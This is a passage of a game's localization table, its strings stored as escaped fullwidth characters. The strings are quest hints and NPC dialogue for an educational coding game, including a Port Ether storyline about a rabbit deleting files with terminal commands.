["portetherHelp1b"] = "\239\188\167\239\189\143 \239\189\130\239\189\129\239\189\131\239\189\139 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\188\173\239\189\129\239\189\153\239\189\143\239\189\146 \239\189\137\239\189\142 \239\188\176\239\189\143\239\189\146\239\189\148 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146 \239\188\180\239\189\143\239\189\151\239\189\142 \239\188\168\239\189\129\239\189\140\239\189\140.",
["portetherHelp1c"] = "\239\188\169\239\189\142\239\189\150\239\189\133\239\189\147\239\189\148\239\189\137\239\189\135\239\189\129\239\189\148\239\189\133 \239\189\136\239\189\143\239\189\149\239\189\147\239\189\133\239\189\147 \239\189\137\239\189\142 \239\188\182\239\189\133\239\189\131\239\189\148\239\189\143\239\189\146 \239\188\182\239\189\137\239\189\140\239\189\140\239\189\129\239\189\135\239\189\133.",
["portetherHelp1a"] = "\239\188\172\239\189\143\239\189\143\239\189\139 \239\189\134\239\189\143\239\189\146 \239\189\129 \239\189\136\239\189\143\239\189\149\239\189\147\239\189\133 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\132\239\189\129\239\189\148\239\189\129 \239\189\140\239\189\143\239\189\147\239\189\147 \239\189\137\239\189\142 \239\188\176\239\189\143\239\189\146\239\189\148 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146.",
["hdmiQuestHelp"] = "\239\188\166\239\189\137\239\189\142\239\189\132 \239\189\148\239\189\136\239\189\133 \239\189\142\239\189\133\239\189\151\239\189\147 \239\189\146\239\189\133\239\189\144\239\189\143\239\189\146\239\189\148\239\189\133\239\189\146 \239\189\143\239\189\142 \239\188\168\239\188\164 \239\188\168\239\189\137\239\189\140\239\189\140.",
["portetherHelp1d"] = "\239\188\167\239\189\143 \239\189\130\239\189\129\239\189\131\239\189\139 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\188\173\239\189\129\239\189\153\239\189\143\239\189\146 \239\189\137\239\189\142 \239\188\176\239\189\143\239\189\146\239\189\148 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146 \239\188\180\239\189\143\239\189\151\239\189\142 \239\188\168\239\189\129\239\189\140\239\189\140.",
["pixelHacker"] = "\239\188\176\239\189\137\239\189\152\239\189\133\239\189\140 \239\188\168\239\189\129\239\189\131\239\189\139\239\189\133\239\189\146",
["HDsoundguy"] = "\239\188\165\239\189\131\239\189\136\239\189\143... \239\189\133\239\189\131\239\189\136\239\189\143... \239\189\133\239\189\131\239\189\136\239\189\143...",
["cafeBlocksCode"] = "\239\188\162\239\189\140\239\189\143\239\189\131\239\189\139\239\189\147 \239\188\163\239\189\143\239\189\132\239\189\133 \239\188\166\239\189\129\239\189\142",
["portetherLibrarian1"] = "\239\188\183\239\189\133\239\189\140\239\189\131\239\189\143\239\189\141\239\189\133 \239\189\148\239\189\143 \239\188\176\239\189\143\239\189\146\239\189\148 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146 \239\188\172\239\189\137\239\189\130\239\189\146\239\189\129\239\189\146\239\189\153. \239\188\183\239\189\133 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\129\239\189\142 \239\189\133\239\189\152\239\189\131\239\189\133\239\189\140\239\189\140\239\189\133\239\189\142\239\189\148 \239\189\132\239\189\129\239\189\148\239\189\129 \239\189\131\239\189\143\239\189\140\239\189\140\239\189\133\239\189\131\239\189\148\239\189\137\239\189\143\239\189\142. \239\188\168\239\189\143\239\189\151 \239\189\141\239\189\129\239\189\153 \239\188\169 \239\189\136\239\189\133\239\189\140\239\189\144 \239\189\153\239\189\143\239\189\149?",
["portetherLibrarian2"] = "\239\188\183\239\189\133 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\132\239\189\129\239\189\148\239\189\129 \239\189\143\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\140\239\189\133\239\189\135\239\189\133\239\189\142\239\189\132\239\189\129\239\189\146\239\189\153 \239\189\131\239\189\129\239\189\150\239\189\133\239\189\147 \239\189\143\239\189\134 \239\188\178\239\188\161\239\188\173, \239\188\181\239\188\179\239\188\162, \239\188\174\239\188\165\239\188\180 \239\189\129\239\189\142\239\189\132 \239\189\141\239\189\143\239\189\146\239\189\133. \239\188\166\239\189\133\239\189\133\239\189\140 \239\189\134\239\189\146\239\189\133\239\189\133 \239\189\148\239\189\143 \239\189\140\239\189\143\239\189\143\239\189\139 \239\189\129\239\189\146\239\189\143\239\189\149\239\189\142\239\189\132!",
["portetherLibrarian3"] = "\239\188\169'\239\189\150\239\189\133 \239\189\136\239\189\133\239\189\129\239\189\146\239\189\132 \239\189\146\239\189\149\239\189\141\239\189\143\239\189\146\239\189\147 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\189\129\239\189\142 \239\189\129\239\189\142\239\189\137\239\189\141\239\189\129\239\189\140 \239\189\140\239\189\133\239\189\129\239\189\150\239\189\137\239\189\142\239\189\135 \239\189\142\239\189\143\239\189\148\239\189\133\239\189\147 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\144\239\189\129\239\189\151\239\189\144\239\189\146\239\189\137\239\189\142\239\189\148\239\189\147 \239\189\137\239\189\142 \239\188\166\239\189\143\239\189\140\239\189\132\239\189\133\239\189\146\239\189\148\239\189\143\239\189\142. \239\188\185\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\148\239\189\146\239\189\129\239\189\150\239\189\133\239\189\140 \239\189\148\239\189\136\239\189\133\239\189\146\239\189\133 \239\189\134\239\189\146\239\189\143\239\189\141 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146 \239\188\179\239\189\148 \239\188\179\239\189\148\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142.",
["HDMasterName"] = "\239\188\168\239\188\164 \239\188\163\239\189\129\239\189\141\239\189\133\239\189\146\239\189\129\239\189\141\239\189\129\239\189\142",
["playPong"] = "\239\188\176\239\189\140\239\189\129\239\189\153 \239\188\176\239\189\143\239\189\142\239\189\135",
["level"] = "\239\188\185\239\189\143\239\189\149 \239\189\129\239\189\146\239\189\133 \239\189\137\239\189\142 \239\189\140\239\189\133\239\189\150\239\189\133\239\189\140 $1, \239\189\129\239\189\142\239\189\132 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133\239\189\132 $2 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133\239\189\147",
["jungleTilde2"] = "\239\188\167\239\189\143 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\137\239\189\135\239\189\136\239\189\148 \239\189\148\239\189\143 \239\189\134\239\189\137\239\189\142\239\189\132 \239\189\148\239\189\136\239\189\133 \239\189\145\239\189\149\239\189\137\239\189\154.",
["powerArea"] = "\239\188\176\239\189\143\239\189\151\239\189\133\239\189\146 \239\188\176\239\189\143\239\189\146\239\189\148",
["portetherDancer2"] = "\239\188\169 \239\189\136\239\189\133\239\189\129\239\189\146 \239\189\147\239\189\143\239\189\141\239\189\133\239\189\148\239\189\136\239\189\137\239\189\142\239\189\135 \239\189\137\239\189\147 \239\189\132\239\189\133\239\189\140\239\189\133\239\189\148\239\189\137\239\189\142\239\189\135 \239\189\134\239\189\137\239\189\140\239\189\133\239\189\147 \239\189\129\239\189\146\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\136\239\189\133\239\189\146\239\189\133. \239\188\183\239\189\136\239\189\129\239\189\148 \239\189\132\239\189\143 \239\189\153\239\189\143\239\189\149 \239\189\148\239\189\136\239\189\137\239\189\142\239\189\139?",
["cLEDTitle"] = "\239\188\172\239\188\165\239\188\164",
["chilledgirlDiag0"] = "\239\188\183\239\189\143\239\189\129\239\189\136! \239\188\183\239\189\136\239\189\133\239\189\146\239\189\133'\239\189\132 \239\189\153\239\189\143\239\189\149 \239\189\138\239\189\149\239\189\147\239\189\148 \239\189\131\239\189\143\239\189\141\239\189\133 \239\189\134\239\189\146\239\189\143\239\189\141? \239\188\183\239\189\129\239\189\147 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\147\239\189\148\239\189\146\239\189\129\239\189\142\239\189\135\239\189\133 \239\189\146\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\153\239\189\143\239\189\149?",
["mrInfoQuestHelp1"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\188\169\239\189\142\239\189\134\239\189\143 \239\188\163\239\189\133\239\189\142\239\189\148\239\189\133\239\189\146 \239\189\143\239\189\142 \239\188\179\239\188\164 \239\188\162\239\189\133\239\189\129\239\189\131\239\189\136.",
["mrInfoQuestHelp2"] = "\239\188\179\239\189\133\239\189\133 \239\189\151\239\189\136\239\189\129\239\189\148 \239\189\133\239\189\140\239\189\147\239\189\133 \239\188\173\239\189\146. \239\188\169\239\189\142\239\189\134\239\189\143 \239\189\136\239\189\129\239\189\147 \239\189\148\239\189\143 \239\189\147\239\189\129\239\189\153.",
["mrInfoQuestHelp3"] = "\239\188\165\239\189\152\239\189\144\239\189\140\239\189\143\239\189\146\239\189\133 \239\189\129\239\189\148 \239\189\140\239\189\133\239\189\129\239\189\147\239\189\148 50% \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 \239\189\151\239\189\143\239\189\146\239\189\140\239\189\132.",
["mrInfoQuestHelp4"] = "\239\188\167\239\189\143 \239\189\130\239\189\129\239\189\131\239\189\139 \239\189\148\239\189\143 \239\188\173\239\189\146. \239\188\169\239\189\142\239\189\134\239\189\143 \239\189\143\239\189\142 \239\188\179\239\188\164 \239\188\162\239\189\133\239\189\129\239\189\131\239\189\136.",
["LogicLakeNerdQuestTitle"] = "\239\188\168\239\189\143\239\189\151 \239\189\132\239\189\143 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146\239\189\147 \239\189\148\239\189\136\239\189\137\239\189\142\239\189\139?",
["village_house02Computer"] = "\239\188\180\239\189\136\239\189\133\239\189\146\239\189\133 \239\189\129\239\189\146\239\189\133 \239\189\147\239\189\143\239\189\141\239\189\133 \239\189\148\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140 \239\189\131\239\189\143\239\189\141\239\189\141\239\189\129\239\189\142\239\189\132\239\189\147 \239\189\143\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\147\239\189\131\239\189\146\239\189\133\239\189\133\239\189\142.",
["plainsArea"] = "\239\188\166\239\189\137\239\189\130\239\189\133\239\189\146\239\189\135\239\189\140\239\189\129\239\189\147\239\189\147 \239\188\176\239\189\140\239\189\129\239\189\137\239\189\142\239\189\147",
["codexDiscovered"] = "\239\188\163\239\189\143\239\189\132\239\189\133\239\189\152 \239\188\169\239\189\148\239\189\133\239\189\141\239\189\147 \239\188\164\239\189\137\239\189\147\239\189\131\239\189\143\239\189\150\239\189\133\239\189\146\239\189\133\239\189\132",
["what"] = "\239\188\183\239\189\136\239\189\129\239\189\148 \239\189\137\239\189\147 \239\189\148\239\189\136\239\189\137\239\189\147?",
["pongQuestComplete"] = "\239\188\163\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133\239\189\132 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\176\239\189\143\239\189\142\239\189\135 \239\189\130\239\189\129\239\189\147\239\189\137\239\189\131\239\189\147.",
["cEnergyTitle"] = "\239\188\165\239\189\142\239\189\133\239\189\146\239\189\135\239\189\153",
["portetherMayorDiag"] = "\239\188\183\239\189\133\239\189\140\239\189\131\239\189\143\239\189\141\239\189\133. \239\188\169'\239\189\141 \239\189\148\239\189\136\239\189\133 \239\188\173\239\189\129\239\189\153\239\189\143\239\189\146 \239\189\143\239\189\134 \239\188\176\239\189\143\239\189\146\239\189\148 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146. \239\188\168\239\189\133\239\189\146\239\189\133 \239\189\151\239\189\133 \239\189\147\239\189\144\239\189\133\239\189\131\239\189\137\239\189\129\239\189\140\239\189\137\239\189\147\239\189\133 \239\189\137\239\189\142 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146\239\189\142\239\189\133\239\189\148 \239\189\129\239\189\142\239\189\132 \239\188\161\239\189\149\239\189\132\239\189\137\239\189\143 \239\189\144\239\189\143\239\189\146\239\189\148\239\189\147. \239\188\180\239\189\136\239\189\133\239\189\153 \239\189\130\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\136\239\189\133 \239\189\137\239\189\142\239\189\148\239\189\133\239\189\146\239\189\142\239\189\133\239\189\148 \239\189\137\239\189\142, \239\189\129\239\189\142\239\189\132 \239\189\147\239\189\133\239\189\142\239\189\132 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132\239\189\147 \239\189\143\239\189\149\239\189\148.",
["minecraftQuestComplete"] = "\239\188\163\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133\239\189\132 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133 5 \239\189\137\239\189\142 \239\188\168\239\189\129\239\189\131\239\189\139 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\131\239\189\146\239\189\129\239\189\134\239\189\148.",
["backCodex"] = "\239\188\162\239\189\129\239\189\131\239\189\139 \239\189\148\239\189\143 \239\188\163\239\189\143\239\189\132\239\189\133\239\189\152",
["llFarmer"] = "\239\188\180\239\189\136\239\189\133\239\189\147\239\189\133 \239\189\153\239\189\133\239\189\140\239\189\140\239\189\143\239\189\151 \239\188\168\239\188\164\239\188\173\239\188\169 \239\189\131\239\189\129\239\189\130\239\189\140\239\189\133\239\189\147 \239\189\129\239\189\146\239\189\133 '\239\188\168\239\189\137\239\189\135\239\189\136-\239\188\164\239\189\133\239\189\134\239\189\137\239\189\142\239\189\137\239\189\148\239\189\137\239\189\143\239\189\142'. \239\188\180\239\189\136\239\189\133\239\189\153 \239\189\147\239\189\133\239\189\142\239\189\132 '\239\188\173\239\189\133\239\189\132\239\189\137\239\189\129' - \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\129\239\189\142\239\189\132 \239\189\144\239\189\137\239\189\131\239\189\148\239\189\149\239\189\146\239\189\133\239\189\147. \239\188\180\239\189\136\239\189\129\239\189\148 \239\189\141\239\189\129\239\189\139\239\189\133\239\189\147 \239\189\148\239\189\136\239\189\133\239\189\141 \239\189\129\239\189\142 '\239\188\169\239\189\142\239\189\148\239\189\133\239\189\146\239\189\134\239\189\129\239\189\131\239\189\133.'",
["villageSummercampGirl2"] = "\239\188\182\239\189\133\239\189\131\239\189\148\239\189\143\239\189\146\239\189\147! \239\188\161 \239\189\150\239\189\133\239\189\131\239\189\148\239\189\143\239\189\146 \239\189\148\239\189\133\239\189\140\239\189\140\239\189\147 \239\189\149\239\189\147 \239\189\136\239\189\143\239\189\151 \239\189\134\239\189\129\239\189\146 \239\189\129\239\189\151\239\189\129\239\189\153 \239\189\143\239\189\142\239\189\133 \239\189\144\239\189\143\239\189\137\239\189\142\239\189\148 \239\189\137\239\189\147 \239\189\129\239\189\151\239\189\129\239\189\153 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\129\239\189\142\239\189\143\239\189\148\239\189\136\239\189\133\239\189\146. \239\188\180\239\189\136\239\189\129\239\189\148'\239\189\147 \239\189\136\239\189\143\239\189\151 \239\189\144\239\189\146\239\189\143\239\189\135\239\189\146\239\189\129\239\189\141\239\189\147 \239\189\140\239\189\137\239\189\139\239\189\133 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 \239\189\131\239\189\129\239\189\142 \239\189\132\239\189\146\239\189\129\239\189\151 \239\189\148\239\189\136\239\189\133\239\189\137\239\189\146 \239\189\147\239\189\136\239\189\129\239\189\144\239\189\133\239\189\147 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\131\239\189\143\239\189\132\239\189\133!",
["minecraftQuestHelp3"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\188\161\239\189\140\239\189\133\239\189\152 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133 \239\188\162\239\189\140\239\189\143\239\189\131\239\189\139 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\147.",
["minecraftQuestHelp2"] = "\239\188\163\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133 5 \239\189\143\239\189\134 \239\188\168\239\189\129\239\189\131\239\189\139 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\131\239\189\146\239\189\129\239\189\134\239\189\148.",
["minecraftQuestHelp1"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\188\161\239\189\140\239\189\133\239\189\152 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\148\239\189\136\239\189\133 \239\188\162\239\189\140\239\189\143\239\189\131\239\189\139 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\147.",
["jungleAsterixHelp3"] = "\239\188\178\239\189\133\239\189\144\239\189\143\239\189\146\239\189\148 \239\189\130\239\189\129\239\189\131\239\189\139 \239\189\148\239\189\143 \239\188\161\239\189\147\239\189\148\239\189\133\239\189\146\239\189\137\239\189\152 \239\189\137\239\189\142 \239\188\176\239\189\153\239\189\148\239\189\136\239\189\143\239\189\142 \239\188\170\239\189\149\239\189\142\239\189\135\239\189\140\239\189\133.",
["sine"] = "\239\188\179\239\189\137\239\189\142\239\189\133",
["search"] = "\239\189\147\239\189\133\239\189\129\239\189\146\239\189\131\239\189\136",
["painting1"] = "\239\188\172\239\189\129\239\189\149\239\189\142\239\189\131\239\189\136 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142 \239\189\137\239\189\142 \239\188\171\239\189\129\239\189\142\239\189\143 \239\188\183\239\189\143\239\189\146\239\189\140\239\189\132?",
["tempNoUpdatesCopy"] = "\239\188\161\239\189\151\239\189\133\239\189\147\239\189\143\239\189\141\239\189\133! \239\188\185\239\189\143\239\189\149'\239\189\146\239\189\133 \239\189\134\239\189\149\239\189\140\239\189\140\239\189\153 \239\189\149\239\189\144 \239\189\148\239\189\143 \239\189\132\239\189\129\239\189\148\239\189\133. \239\188\163\239\189\143\239\189\141\239\189\133 \239\189\130\239\189\129\239\189\131\239\189\139 \239\189\148\239\189\143 \239\189\131\239\189\136\239\189\133\239\189\131\239\189\139 \239\189\134\239\189\143\239\189\146 \239\189\149\239\189\144\239\189\132\239\189\129\239\189\148\239\189\133\239\189\147 \239\189\147\239\189\143\239\189\143\239\189\142.",
["LakeExitSign"] = "\239\188\165\239\189\152\239\189\137\239\189\148 \239\189\148\239\189\143 \239\188\166\239\189\137\239\189\130\239\189\133\239\189\146\239\189\135\239\189\140\239\189\129\239\189\147\239\189\147 \239\188\176\239\189\140\239\189\129\239\189\137\239\189\142\239\189\147",
["cVoltage"] = "\239\188\182\239\189\143\239\189\140\239\189\148\239\189\129\239\189\135\239\189\133, \239\189\129\239\189\140\239\189\147\239\189\143 \239\189\131\239\189\129\239\189\140\239\189\140\239\189\133\239\189\132 \239\189\133\239\189\140\239\189\133\239\189\131\239\189\148\239\189\146\239\189\143\239\189\141\239\189\143\239\189\148\239\189\137\239\189\150\239\189\133 \239\189\134\239\189\143\239\189\146\239\189\131\239\189\133, \239\189\137\239\189\147 \239\189\129 \239\189\145\239\189\149\239\189\129\239\189\142\239\189\148\239\189\137\239\189\148\239\189\129\239\189\148\239\189\137\239\189\150\239\189\133 \239\189\133\239\189\152\239\189\144\239\189\146\239\189\133\239\189\147\239\189\147\239\189\137\239\189\143\239\189\142 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 \239\189\144\239\189\143\239\189\148\239\189\133\239\189\142\239\189\148\239\189\137\239\189\129\239\189\140 \239\189\132\239\189\137\239\189\134\239\189\134\239\189\133\239\189\146\239\189\133\239\189\142\239\189\131\239\189\133 \239\189\137\239\189\142 \239\189\131\239\189\136\239\189\129\239\189\146\239\189\135\239\189\133 \239\189\130\239\189\133\239\189\148\239\189\151\239\189\133\239\189\133\239\189\142 \239\189\148\239\189\151\239\189\143 \239\189\144\239\189\143\239\189\137\239\189\142\239\189\148\239\189\147 \239\189\137\239\189\142 \239\189\129\239\189\142 \239\189\133\239\189\140\239\189\133\239\189\131\239\189\148\239\189\146\239\189\137\239\189\131\239\189\129\239\189\140 \239\189\134\239\189\137\239\189\133\239\189\140\239\189\132.",
["discoGirl"] = "\239\188\183\239\189\143\239\189\143\239\189\143! \239\188\169 \239\189\140\239\189\143\239\189\150\239\189\133 \239\189\136\239\189\143\239\189\151 \239\189\148\239\189\136\239\189\133 \239\189\147\239\189\144\239\189\133\239\189\133\239\189\132 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 \239\189\150\239\189\137\239\189\130\239\189\146\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142 \239\189\129\239\189\134\239\189\134\239\189\133\239\189\131\239\189\148\239\189\147 \239\189\136\239\189\143\239\189\151 \239\189\136\239\189\137\239\189\135\239\189\136 \239\189\143\239\189\146 \239\189\140\239\189\143\239\189\151 \239\189\129 \239\189\142\239\189\143\239\189\148\239\189\133 \239\189\137\239\189\147.",
["minecraft"] = "\239\188\168\239\189\129\239\189\131\239\189\139 \239\189\148\239\189\136\239\189\133 \239\189\135\239\189\129\239\189\141\239\189\133",
["jungleScaredGirl"] = "\239\188\165\239\189\133\239\189\133\239\189\133\239\189\139 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\147\239\189\142\239\189\129\239\189\139\239\189\133! \239\188\169 \239\189\151\239\189\129\239\189\147 \239\189\143\239\189\142 \239\189\141\239\189\153 \239\189\151\239\189\129\239\189\153 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\188\162\239\189\140\239\189\143\239\189\131\239\189\139 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\147 \239\189\130\239\189\149\239\189\148 \239\188\169'\239\189\141 \239\189\148\239\189\143\239\189\143 \239\189\147\239\189\131\239\189\129\239\189\146\239\189\133\239\189\132 \239\189\148\239\189\143 \239\189\141\239\189\143\239\189\150\239\189\133.",
["Asterix"] = "\239\188\161\239\189\147\239\189\148\239\189\133\239\189\146\239\189\137\239\189\152",
["portetherQuest1b"] = "\239\188\183\239\189\136\239\189\129\239\189\148? \239\188\176\239\189\129\239\189\146\239\189\148 \239\189\143\239\189\134 \239\189\137\239\189\148 \239\189\151\239\189\129\239\189\147 \239\189\141\239\189\143\239\189\150\239\189\133\239\189\132? \239\188\164\239\189\143\239\189\133\239\189\147 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\144\239\189\133\239\189\147\239\189\139\239\189\153 \239\189\146\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\141\239\189\129\239\189\135\239\189\137\239\189\131\239\189\129\239\189\140 \239\189\131\239\189\143\239\189\141\239\189\141\239\189\129\239\189\142\239\189\132\239\189\147? \239\188\169'\239\189\150\239\189\133 \239\189\129\239\189\140\239\189\147\239\189\143 \239\189\136\239\189\133\239\189\129\239\189\146\239\189\132 \239\189\146\239\189\149\239\189\141\239\189\143\239\189\149\239\189\146\239\189\147 \239\189\137\239\189\142 \239\188\182\239\189\133\239\189\131\239\189\148\239\189\143\239\189\146 \239\188\182\239\189\137\239\189\140\239\189\140\239\189\129\239\189\135\239\189\133, \239\189\131\239\189\129\239\189\142 \239\189\153\239\189\143\239\189\149 \239\189\148\239\189\129\239\189\139\239\189\133 \239\189\129 \239\189\140\239\189\143\239\189\143\239\189\139?",
["portetherQuest1c"] = "\239\188\185\239\189\143\239\189\149 \239\189\147\239\189\133\239\189\133 \239\189\129 \239\189\147\239\189\133\239\189\131\239\189\148\239\189\137\239\189\143\239\189\142 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 \239\189\151\239\189\143\239\189\146\239\189\140\239\189\132 \239\189\136\239\189\129\239\189\147 \239\189\130\239\189\133\239\189\133\239\189\142 \239\189\146\239\189\133\239\189\141\239\189\143\239\189\150\239\189\133\239\189\132. \239\188\161\239\189\142\239\189\132 \239\189\129 \239\189\142\239\189\143\239\189\148\239\189\133 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\148\239\189\136\239\189\133 \239\189\140\239\189\133\239\189\148\239\189\148\239\189\133\239\189\146\239\189\147 \239\188\178\239\188\173.",
["portetherQuest1d"] = "\239\188\164\239\189\133\239\189\140\239\189\133\239\189\148\239\189\133\239\189\132? \239\188\178\239\188\173? \239\188\180\239\189\136\239\189\137\239\189\147 \239\189\137\239\189\147 \239\189\130\239\189\129\239\189\132. \239\188\180\239\189\136\239\189\129\239\189\148 \239\189\146\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148 \239\189\141\239\189\149\239\189\147\239\189\148 \239\189\130\239\189\133 \239\189\149\239\189\147\239\189\137\239\189\142\239\189\135 \239\188\180\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140 \239\188\163\239\189\143\239\189\141\239\189\141\239\189\129\239\189\142\239\189\132\239\189\147 \239\189\148\239\189\143 \239\189\129\239\189\140\239\189\148\239\189\133\239\189\146 \239\189\148\239\189\136\239\189\137\239\189\142\239\189\135\239\189\147. \239\188\179\239\189\144\239\189\133\239\189\129\239\189\139 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\148\239\189\146\239\189\137\239\189\130\239\189\133 \239\189\137\239\189\142 \239\188\176\239\189\153\239\189\148\239\189\136\239\189\143\239\189\142 \239\188\170\239\189\149\239\189\142\239\189\135\239\189\140\239\189\133, \239\189\148\239\189\136\239\189\133\239\189\153 \239\189\129\239\189\146\239\189\133 \239\189\151\239\189\137\239\189\147\239\189\133 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\151\239\189\129\239\189\153\239\189\147 \239\189\143\239\189\134 \239\188\180\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140. \239\188\162\239\189\149\239\189\148 \239\189\130\239\189\133 \239\189\131\239\189\129\239\189\146\239\189\133\239\189\134\239\189\149\239\189\140.",
["Radu"] = "\239\188\178\239\189\129\239\189\132\239\189\149",
["portetherMayorDiag4"] = "\239\188\180\239\189\136\239\189\129\239\189\142\239\189\139\239\189\147 \239\189\134\239\189\143\239\189\146 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\136\239\189\133\239\189\140\239\189\144. \239\188\169\239\189\148 \239\189\140\239\189\143\239\189\143\239\189\139\239\189\147 \239\189\140\239\189\137\239\189\139\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\129\239\189\146\239\189\133 \239\189\148\239\189\146\239\189\129\239\189\137\239\189\142\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\143 \239\189\130\239\189\133\239\189\131\239\189\143\239\189\141\239\189\133 \239\189\129 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146\239\189\134\239\189\149\239\189\140 \239\188\171\239\189\129\239\189\142\239\189\143 \239\188\173\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146.",
["portetherMayorDiag3"] = "\239\188\180\239\189\136\239\189\129\239\189\142\239\189\139\239\189\147 \239\189\134\239\189\143\239\189\146 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\136\239\189\133\239\189\140\239\189\144. \239\188\164\239\189\143 \239\189\140\239\189\133\239\189\148 \239\189\141\239\189\133 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\137\239\189\134 \239\189\148\239\189\136\239\189\133\239\189\146\239\189\133'\239\189\147 \239\189\129\239\189\142\239\189\153\239\189\148\239\189\136\239\189\137\239\189\142\239\189\135 \239\189\133\239\189\140\239\189\147\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\134\239\189\137\239\189\142\239\189\132 \239\189\143\239\189\149\239\189\148 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\188\166\239\189\143\239\189\140\239\189\132\239\189\133\239\189\146\239\189\148\239\189\143\239\189\142.",
["portetherMayorDiag2"] = "\239\188\169 \239\189\147\239\189\133\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\150\239\189\137\239\189\147\239\189\137\239\189\148\239\189\133\239\189\132 \239\188\166\239\189\143\239\189\140\239\189\132\239\189\133\239\189\146\239\189\148\239\189\143\239\189\142. \239\188\163\239\189\143\239\189\141\239\189\133 \239\189\130\239\189\129\239\189\131\239\189\139 \239\189\148\239\189\143 \239\189\141\239\189\133 \239\189\137\239\189\134 \239\189\153\239\189\143\239\189\149 \239\189\149\239\189\142\239\189\131\239\189\143\239\189\150\239\189\133\239\189\146 \239\189\129\239\189\142\239\189\153\239\189\148\239\189\136\239\189\137\239\189\142\239\189\135 \239\189\137\239\189\142\239\189\148\239\189\133\239\189\146\239\189\133\239\189\147\239\189\148\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\136\239\189\129\239\189\148'\239\189\147 \239\189\136\239\189\129\239\189\144\239\189\144\239\189\133\239\189\142\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\136\239\189\133\239\189\146\239\189\133. \239\188\180\239\189\136\239\189\133\239\189\146\239\189\133 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\130\239\189\133\239\189\133\239\189\142 